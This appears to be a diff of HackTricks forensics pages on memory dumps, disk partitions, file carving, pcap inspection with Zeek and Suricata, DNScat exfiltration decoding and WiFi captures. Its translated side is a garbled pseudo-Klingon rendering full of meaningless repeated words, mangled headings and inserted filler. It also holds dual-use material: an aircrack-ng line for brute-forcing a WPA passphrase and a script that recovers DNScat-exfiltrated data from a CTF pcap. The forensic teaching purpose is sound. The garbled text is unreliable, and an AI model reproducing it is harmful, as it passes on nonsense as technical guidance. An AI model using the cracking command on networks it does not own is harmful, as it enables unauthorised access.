<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure> <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. [**RootedCON**](https://www.rootedcon.com/) **Spain** 'e' **relevant cybersecurity event** 'ej **Europe** 'e' **important**. **technical knowledge promoting mission** 'e' **congress** 'e' **technology** 'ej **cybersecurity professionals** 'e' **boiling meeting point**.
{% embed url="https://www.rootedcon.com/" %} {% embed url="https://www.rootedcon.com/" %}
## Start ## Start
Start **searching** for **malware** inside the pcap. Use the **tools** mentioned in [**Malware Analysis**](../malware-analysis.md). **pcap** 'e' **malware** **search** **Start**. [**Malware Analysis**](../malware-analysis.md) **mentioned tools** **Use**.
## [Volatility](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md) ## [Volatility](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)
**Volatility is the main open-source framework for memory dump analysis**. This Python tool analyzes dumps from external sources or VMware VMs, identifying data like processes and passwords based on the dump's OS profile. It's extensible with plugins, making it highly versatile for forensic investigations. **Volatility** **main open-source framework** 'e' **memory dump analysis**. **Python tool** 'e' **external sources** 'ej **VMware VMs** **analyze** 'ej **processes** 'ej **passwords** **identify** 'e' **dump's OS profile**. **plugins** 'e' **extensible**, **forensic investigations** **versatile** 'e'.
**[Find here a cheatsheet](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)**
**[cheatsheet** **Find here**](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)**
## Mini dump crash report ## Mini dump crash report
When the dump is small (just some KB, maybe a few MB) then it's probably a mini dump crash report and not a memory dump. **dump** **small** (just some KB, maybe a few MB) **probably mini dump crash report** 'ej **memory dump** 'oH.
![](<../../../.gitbook/assets/image (216).png>) ![](<../../../.gitbook/assets/image (216).png>)
If you have Visual Studio installed, you can open this file and bind some basic information like process name, architecture, exception info and modules being executed: **Visual Studio** **installed** 'oH, **file** **open** 'ej **basic information** **bind** 'ej **process name**, **architecture**, **exception info** 'ej **modules being executed**:
![](<../../../.gitbook/assets/image (217).png>) ![](<../../../.gitbook/assets/image (217).png>)
You can also load the exception and see the decompiled instructions **exception** **load** 'ej **decompiled instructions** **see**
![](<../../../.gitbook/assets/image (219).png>) ![](<../../../.gitbook/assets/image (219).png>)
![](<../../../.gitbook/assets/image (218) (1).png>) ![](<../../../.gitbook/assets/image (218) (1).png>)
Anyway, Visual Studio isn't the best tool to perform an analysis of the depth of the dump. **Visual Studio** **best tool** **dump depth analysis** **perform**.
You should **open** it using **IDA** or **Radare** to inspection it in **depth**.
**IDA** 'ej **Radare** **open** **should** **inspection** 'e' **depth**.
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure> <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. [**RootedCON**](https://www.rootedcon.com/) **Spain** 'e' **relevant cybersecurity event** 'ej **Europe** 'e' **important**. **technical knowledge promoting mission** 'e' **congress** 'e' **technology** 'ej **cybersecurity professionals** 'e' **boiling meeting point**.
{% embed url="https://www.rootedcon.com/" %} {% embed url="https://www.rootedcon.com/" %}
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>DaH jImej</strong></a><strong>! HackTricks</strong> 'e' vItlhutlh</summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * **cybersecurity company** 'oH? **HackTricks** vItlhutlh **company** advertise **chavmoH**? 'ej **PEASS latest version** **download** 'ej **HackTricks PDF** **access** vItlhutlh? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **qaStaHvIS**!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **Discover**, **exclusive NFTs** [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **collection**
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Get**
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Join** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) **telegram group** [**follow**] **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. * **Share** hacking tricks **hacktricks repo** 'ej [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) **submit** PRs.
</details> </details>

View file

@ -4,7 +4,7 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks AWS Red Team Expert</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -63,17 +63,15 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig
In order to mount an MBR in Linux you first need to get the start offset (you can use `fdisk` and the `p` command) In order to mount an MBR in Linux you first need to get the start offset (you can use `fdisk` and the `p` command)
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png>) ![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png>)
And then use the following code And then use the following code
```bash ```bash
#Mount MBR in Linux #Mount MBR in Linux
mount -o ro,loop,offset=<Bytes> mount -o ro,loop,offset=<Bytes>
#63x512 = 32256Bytes #63x512 = 32256Bytes
mount -o ro,loop,offset=32256,noatime /path/to/image.dd /media/part/ mount -o ro,loop,offset=32256,noatime /path/to/image.dd /media/part/
``` ```
**LBA (Logical block addressing)** **LBA (Logical block addressing)**
**Logical block addressing** (**LBA**) is a common scheme used for **specifying the location of blocks** of data stored on computer storage devices, generally secondary storage systems such as hard disk drives. LBA is a particularly simple linear addressing scheme; **blocks are located by an integer index**, with the first block being LBA 0, the second LBA 1, and so on. **Logical block addressing** (**LBA**) is a common scheme used for **specifying the location of blocks** of data stored on computer storage devices, generally secondary storage systems such as hard disk drives. LBA is a particularly simple linear addressing scheme; **blocks are located by an integer index**, with the first block being LBA 0, the second LBA 1, and so on.
@ -152,7 +150,6 @@ After mounting the forensics image with [**ArsenalImageMounter**](https://arsena
![](<../../../.gitbook/assets/image (494).png>) ![](<../../../.gitbook/assets/image (494).png>)
If it was a **GPT table instead of an MBR** it should appear the signature _EFI PART_ in the **sector 1** (which in the previous image is empty). If it was a **GPT table instead of an MBR** it should appear the signature _EFI PART_ in the **sector 1** (which in the previous image is empty).
## File-Systems ## File-Systems
### Windows file-systems list ### Windows file-systems list
@ -165,7 +162,7 @@ If it was a **GPT table instead of an MBR** it should appear the signature _EFI
### FAT ### FAT
The **FAT (File Allocation Table)** file system is designed around its core component, the file allocation table, positioned at the volume's start. This system safeguards data by maintaining **two copies** of the table, ensuring data integrity even if one is corrupted. The table, along with the root folder, must be in a **fixed location**, crucial for the system's startup process. **FAT (File Allocation Table)** file system jup around its core component, the file allocation table, positioned at the volume's start. This system safeguards data by maintaining **two copies** of the table, ensuring data integrity even if one is corrupted. The table, along with the root folder, must be in a **fixed location**, crucial for the system's startup process.
The file system's basic unit of storage is a **cluster, usually 512B**, comprising multiple sectors. FAT has evolved through versions: The file system's basic unit of storage is a **cluster, usually 512B**, comprising multiple sectors. FAT has evolved through versions:

View file

@ -1,8 +1,6 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks AWS Red Team Expert</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -35,42 +33,42 @@ The most common tool used in forensics to extract files from images is [**Autops
**Binwalk** is a tool for analyzing binary files to find embedded content. It's installable via `apt` and its source is on [GitHub](https://github.com/ReFirmLabs/binwalk). **Binwalk** is a tool for analyzing binary files to find embedded content. It's installable via `apt` and its source is on [GitHub](https://github.com/ReFirmLabs/binwalk).
**Useful commands**: **Useful commands**:
```bash ```bash
sudo apt install binwalk #Insllation sudo apt install binwalk #Insllation
binwalk file #Displays the embedded data in the given file binwalk file #Displays the embedded data in the given file
binwalk -e file #Displays and extracts some files from the given file binwalk -e file #Displays and extracts some files from the given file
binwalk --dd ".*" file #Displays and extracts all files from the given file binwalk --dd ".*" file #Displays and extracts all files from the given file
``` ```
## Foremost ## Foremost
Another common tool to find hidden files is **foremost**. You can find the configuration file of foremost in `/etc/foremost.conf`. If you just want to search for some specific files uncomment them. If you don't uncomment anything foremost will search for its default configured file types. **Foremost** jatlhlaHbe'chugh vItlhutlh. **Foremost** DaH jatlhlaHbe'chugh vItlhutlh `/etc/foremost.conf` DaH. vaj vItlhutlh 'ejatlhlaHbe'chugh vItlhutlh vItlhutlh. vaj vItlhutlh 'ejatlhlaHbe'chugh vItlhutlh vItlhutlh.
```bash ```bash
sudo apt-get install foremost sudo apt-get install foremost
foremost -v -i file.img -o output foremost -v -i file.img -o output
#Discovered files will appear inside the folder "output" #Discovered files will appear inside the folder "output"
``` ```
## **Scalpel** ## **Scalpel**
**Scalpel** is another tool that can be used to find and extract **files embedded in a file**. In this case, you will need to uncomment from the configuration file (_/etc/scalpel/scalpel.conf_) the file types you want it to extract. **Scalpel** vItlhutlh is another tool that can be used to find and extract **files embedded in a file**. In this case, you will need to uncomment from the configuration file (_/etc/scalpel/scalpel.conf_) the file types you want it to extract.
```bash ```bash
sudo apt-get install scalpel sudo apt-get install scalpel
scalpel file.img -o output scalpel file.img -o output
``` ```
## Bulk Extractor ## Bulk Extractor
This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk\_extractor) This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk\_extractor)
This tool can scan an image and will **extract pcaps** inside it, **network information (URLs, domains, IPs, MACs, mails)** and more **files**. You only have to do: This tool can scan an image and will **extract pcaps** inside it, **network information (URLs, domains, IPs, MACs, mails)** and more **files**. You only have to do:
## Bulk Extractor
vaj tlhIngan Hol vItlhutlh: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk\_extractor)
vaj tlhIngan Hol vItlhutlh vItlhutlh scan 'ej **pcaps** vItlhutlh, **network information (URLs, domains, IPs, MACs, mails)** 'ej **files** vItlhutlh. bIquv, bIjatlh:
``` ```
bulk_extractor memory.img -o out_folder bulk_extractor memory.img -o out_folder
``` ```
**tlhIngan Hol**:
Navigate through **all the information** that the tool has gathered (passwords?), **analyse** the **packets** (read[ **Pcaps analysis**](../pcap-inspection/)), search for **weird domains** (domains related to **malware** or **non-existent**). Navigate through **all the information** that the tool has gathered (passwords?), **analyse** the **packets** (read[ **Pcaps analysis**](../pcap-inspection/)), search for **weird domains** (domains related to **malware** or **non-existent**).
@ -132,5 +130,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

View file

@ -2,7 +2,7 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -51,21 +51,17 @@ You can find some Wireshark tricks in:
[**Xplico** ](https://github.com/xplico/xplico)_(only linux)_ can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico, extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on. [**Xplico** ](https://github.com/xplico/xplico)_(only linux)_ can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico, extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on.
**Install** **Install**
```bash ```bash
sudo bash -c 'echo "deb http://repo.xplico.org/ $(lsb_release -s -c) main" /etc/apt/sources.list' sudo bash -c 'echo "deb http://repo.xplico.org/ $(lsb_release -s -c) main" /etc/apt/sources.list'
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 791C25CE sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 791C25CE
sudo apt-get update sudo apt-get update
sudo apt-get install xplico sudo apt-get install xplico
``` ```
**Qap**
**Run**
``` ```
/etc/init.d/apache2 restart /etc/init.d/apache2 restart
/etc/init.d/xplico start /etc/init.d/xplico start
``` ```
Access to _**127.0.0.1:9876**_ with credentials _**xplico:xplico**_ Access to _**127.0.0.1:9876**_ with credentials _**xplico:xplico**_
Then create a **new case**, create a **new session** inside the case and **upload the pcap** file. Then create a **new case**, create a **new session** inside the case and **upload the pcap** file.
@ -90,19 +86,15 @@ This is another useful tool that **analyses the packets** and sorts the informat
* File Carving * File Carving
### Capinfos ### Capinfos
``` ```
capinfos capture.pcap capinfos capture.pcap
``` ```
### Ngrep ### Ngrep
If you are **looking** for **something** inside the pcap you can use **ngrep**. Here is an example using the main filters: **ngrep** **vItlhutlh** **pcap** **vaj** **ghaH** **ngrep**. **ngrep** **vaj** **example** **ghaH** **main filters** **using**.
```bash ```bash
ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168" ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168"
``` ```
### Carving ### Carving
Using common carving techniques can be useful to extract files and information from the pcap: Using common carving techniques can be useful to extract files and information from the pcap:
@ -126,33 +118,44 @@ You can use tools like [https://github.com/lgandx/PCredz](https://github.com/lga
### Suricata ### Suricata
**Install and setup** **Install and setup**
``` ```
apt-get install suricata apt-get install suricata
apt-get install oinkmaster apt-get install oinkmaster
echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz" >> /etc/oinkmaster.conf echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz" >> /etc/oinkmaster.conf
oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules
``` ```
**Qap pcap**
**Check pcap** To inspect a pcap file, you can use tools like Wireshark or tcpdump. These tools allow you to analyze network traffic captured in the pcap file.
Here are some steps you can follow to check a pcap file:
1. Open the pcap file in Wireshark or tcpdump.
2. Analyze the captured packets to understand the network traffic.
3. Look for any suspicious or abnormal behavior in the packets.
4. Filter the packets based on specific criteria, such as source or destination IP address, protocol, or port number.
5. Use the built-in features of the tool to extract relevant information from the packets, such as HTTP requests, DNS queries, or email conversations.
6. Follow the network flow to identify the source and destination of the traffic.
7. Look for any signs of malicious activity, such as unusual network connections, unauthorized access attempts, or data exfiltration.
8. Take note of any findings or evidence that may be relevant to your investigation.
By carefully inspecting the pcap file, you can gain valuable insights into the network traffic and identify any potential security issues or breaches.
``` ```
suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
``` ```
### YaraPcap ### YaraPcap
[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) is a tool that [**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) jup 'oH tool vItlhutlh
* Reads a PCAP File and Extracts Http Streams. * PCAP File vItlhutlh Http Streams.
* gzip deflates any compressed streams * gzip deflates vItlhutlh compressed streams
* Scans every file with yara * yara vItlhutlh file Scan
* Writes a report.txt * report.txt vItlhutlh vItlhutlh
* Optionally saves matching files to a Dir * matching files vItlhutlh Dir vItlhutlh
### Malware Analysis ### Malware Analysis
Check if you can find any fingerprint of a known malware: known malware fingerprint vItlhutlh 'oH 'oH:
{% content-ref url="../malware-analysis.md" %} {% content-ref url="../malware-analysis.md" %}
[malware-analysis.md](../malware-analysis.md) [malware-analysis.md](../malware-analysis.md)
@ -160,12 +163,9 @@ Check if you can find any fingerprint of a known malware:
## Zeek ## Zeek
> [Zeek](https://docs.zeek.org/en/master/about.html) is a passive, open-source network traffic analyzer. Many operators use Zeek as a Network Security Monitor (NSM) to support investigations of suspicious or malicious activity. Zeek also supports a wide range of traffic analysis tasks beyond the security domain, including performance measurement and troubleshooting. > [Zeek](https://docs.zeek.org/en/master/about.html) passive, open-source network traffic analyzer. Many operators Zeek Network Security Monitor (NSM) support investigations suspicious malicious activity. Zeek supports wide range traffic analysis tasks security domain, performance measurement troubleshooting.
Basically, logs created by `zeek` aren't **pcaps**. Therefore you will need to use **other tools** to analyse the logs where the **information** about the pcaps are.
### Connections Info
Basically, logs created `zeek` aren't **pcaps**. Therefore logs **information** pcaps analysis **other tools** vItlhutlh.
```bash ```bash
#Get info about longest connections (add "grep udp" to see only udp traffic) #Get info about longest connections (add "grep udp" to see only udp traffic)
#The longest connection might be of malware (constant reverse shell?) #The longest connection might be of malware (constant reverse shell?)
@ -215,9 +215,21 @@ Score,Source IP,Destination IP,Connections,Avg Bytes,Intvl Range,Size Range,Top
1,10.55.100.111,165.227.216.194,20054,92,29,52,1,52,7774,20053,0,0,0,0 1,10.55.100.111,165.227.216.194,20054,92,29,52,1,52,7774,20053,0,0,0,0
0.838,10.55.200.10,205.251.194.64,210,69,29398,4,300,70,109,205,0,0,0,0 0.838,10.55.200.10,205.251.194.64,210,69,29398,4,300,70,109,205,0,0,0,0
``` ```
### DNS info ### DNS info
DNS (Domain Name System) is a fundamental component of the internet that translates domain names into IP addresses. It allows users to access websites and other online resources using easy-to-remember domain names instead of complex IP addresses.
When conducting a forensic analysis of network traffic captured in a PCAP file, inspecting DNS information can provide valuable insights. Here are some key details to look for:
- **DNS Queries**: These are requests made by a client to resolve a domain name into an IP address. They typically include the domain name being queried and the type of record being requested (e.g., A, AAAA, MX, NS).
- **DNS Responses**: These are the replies from DNS servers to the client's queries. They contain the resolved IP address or other relevant information, such as the time-to-live (TTL) value.
- **DNS Resource Records**: These are the individual entries in a DNS response that provide specific information about a domain. Common types include A records (IPv4 address), AAAA records (IPv6 address), MX records (mail server), and NS records (name server).
By analyzing DNS information in a PCAP file, you can gain insights into the communication patterns, identify potential malicious activities (e.g., domain generation algorithms, command and control servers), and uncover valuable information for further investigation.
Remember to consider the context and cross-reference DNS information with other network artifacts to get a comprehensive understanding of the network traffic and potential security incidents.
```bash ```bash
#Get info about each DNS request performed #Get info about each DNS request performed
cat dns.log | zeek-cut -c id.orig_h query qtype_name answers cat dns.log | zeek-cut -c id.orig_h query qtype_name answers
@ -234,8 +246,7 @@ cat dns.log | zeek-cut qtype_name | sort | uniq -c | sort -nr
#See top DNS domain requested with rita #See top DNS domain requested with rita
rita show-exploded-dns -H --limit 10 zeek_logs rita show-exploded-dns -H --limit 10 zeek_logs
``` ```
## vItlhutlh
## Other pcap analysis tricks
{% content-ref url="dnscat-exfiltration.md" %} {% content-ref url="dnscat-exfiltration.md" %}
[dnscat-exfiltration.md](dnscat-exfiltration.md) [dnscat-exfiltration.md](dnscat-exfiltration.md)
@ -253,7 +264,7 @@ rita show-exploded-dns -H --limit 10 zeek_logs
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure> <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. [**RootedCON**](https://www.rootedcon.com/) vItlhutlh **Spain** DaH **Europe** Daq yIqIm. **technical knowledge promote** vItlhutlh, 'ej 'oH congress 'e' vItlhutlh 'e' vItlhutlh 'e' technology 'ej cybersecurity professionals Hoch 'ej Hoch.
{% embed url="https://www.rootedcon.com/" %} {% embed url="https://www.rootedcon.com/" %}

View file

@ -1,5 +1,3 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -18,7 +16,6 @@ Other ways to support HackTricks:
If you have pcap with data being **exfiltrated by DNSCat** (without using encryption), you can find the exfiltrated content. If you have pcap with data being **exfiltrated by DNSCat** (without using encryption), you can find the exfiltrated content.
You only need to know that the **first 9 bytes** are not real data but are related to the **C\&C communication**: You only need to know that the **first 9 bytes** are not real data but are related to the **C\&C communication**:
```python ```python
from scapy.all import rdpcap, DNSQR, DNSRR from scapy.all import rdpcap, DNSQR, DNSRR
import struct import struct
@ -26,28 +23,25 @@ import struct
f = "" f = ""
last = "" last = ""
for p in rdpcap('ch21.pcap'): for p in rdpcap('ch21.pcap'):
if p.haslayer(DNSQR) and not p.haslayer(DNSRR): if p.haslayer(DNSQR) and not p.haslayer(DNSRR):
qry = p[DNSQR].qname.replace(".jz-n-bs.local.","").strip().split(".") qry = p[DNSQR].qname.replace(".jz-n-bs.local.","").strip().split(".")
qry = ''.join(_.decode('hex') for _ in qry)[9:] qry = ''.join(_.decode('hex') for _ in qry)[9:]
if last != qry: if last != qry:
print(qry) print(qry)
f += qry f += qry
last = qry last = qry
#print(f) #print(f)
``` ```
For more information: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\ For more information: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\
[https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md) [https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md)
There is a script that works with Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder) There is a script that works with Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
``` ```
python3 dnscat_decoder.py sample.pcap bad_domain python3 dnscat_decoder.py sample.pcap bad_domain
``` ```
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -61,5 +55,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

View file

@ -1,5 +1,3 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -41,5 +39,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

File diff suppressed because one or more lines are too long

View file

@ -1,8 +1,6 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>qaStaHvIS AWS hacking vItlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -26,16 +24,12 @@ When you receive a capture whose principal traffic is Wifi using WireShark you c
## Brute Force ## Brute Force
One of the columns of that screen indicates if **any authentication was found inside the pcap**. If that is the case you can try to Brute force it using `aircrack-ng`: One of the columns of that screen indicates if **any authentication was found inside the pcap**. If that is the case you can try to Brute force it using `aircrack-ng`:
```bash ```bash
aircrack-ng -w pwds-file.txt -b <BSSID> file.pcap aircrack-ng -w pwds-file.txt -b <BSSID> file.pcap
``` ```
For example it will retrieve the WPA passphrase protecting a PSK (pre shared-key), that will be required to decrypt the trafic later.
# Data in Beacons / Side Channel # Data in Beacons / Side Channel
If you suspect that **data is being leaked inside beacons of a Wifi network** you can check the beacons of the network using a filter like the following one: `wlan contains <NAMEofNETWORK>`, or `wlan.ssid == "NAMEofNETWORK"` search inside the filtered packets for suspicious strings. **beacons of a Wifi network** you can check the beacons of the network using a filter like the following one: `wlan contains <NAMEofNETWORK>`, or `wlan.ssid == "NAMEofNETWORK"` search inside the filtered packets for suspicious strings.
# Find Unknown MAC Addresses in A Wifi Network # Find Unknown MAC Addresses in A Wifi Network
@ -70,5 +64,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

View file

